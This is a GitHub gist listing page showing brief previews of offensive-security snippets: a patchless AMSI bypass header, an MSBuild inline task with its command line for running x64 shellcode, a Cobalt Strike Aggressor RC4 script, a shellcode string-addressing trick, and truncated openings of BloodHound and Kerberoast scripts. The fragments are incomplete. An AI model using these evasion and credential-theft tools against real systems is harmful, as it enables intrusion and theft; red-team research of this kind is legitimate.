Skip to content

Instantly share code, notes, and snippets.

@CCob
CCob / patchless_amsi.h
Created Apr 17, 2022
In-Process Patchless AMSI Bypass
View patchless_amsi.h
#ifndef PATCHLESS_AMSI_H
#define PATCHLESS_AMSI_H
#include <windows.h>
static const int AMSI_RESULT_CLEAN = 0;
PVOID g_amsiScanBufferPtr = nullptr;
unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) {
@CCob
CCob / execute_x64_shellcode.xml
Last active May 19, 2021
Execute x64 Shellcode
View execute_x64_shellcode.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes x64 shellcode. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
@CCob
CCob / rc4.cna
Created Jan 28, 2021
Aggressor Script for RC4 encryption
View rc4.cna
#RC4 encryption implementation using Java Crypto API
#Author: @_EthicalChaos_
import javax.crypto.spec.*;
import java.security.*;
import javax.crypto.*;
# $1 = plaintext, $2 = key
sub encryptRC4{
@CCob
CCob / x86_relative_shellcode_strings.c
Last active May 11, 2022
x86 Relative String Addressing Hack
View x86_relative_shellcode_strings.c
#include <stdio.h>
#ifdef _WIN64
#define DECLARE_STRING(var, str) __attribute__((section(".text"))) char var[] = "\xe8\x00\x00\x00\x00\x58\x48\x83\xc0\x06\xc3" str;
#elif _WIN32
#define DECLARE_STRING(var, str) __attribute__((section(".text"))) char var[] = "\xe8\x00\x00\x00\x00\x58\x83\xc0\x05\xc3" str;
#endif
View IBH.txt
This file has been truncated, but you can view the full file.
function Invoke-BH{
param(
[String[]]
$CollectionMethod = [string[]] @('Default'),
[Switch]
$Stealth,
[String]
$Domain,
[Switch]
View IKR.txt
<#
Kerberoast.ps1
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
Note: the primary method of use will be Invoke-Kerberoast with
various targeting options.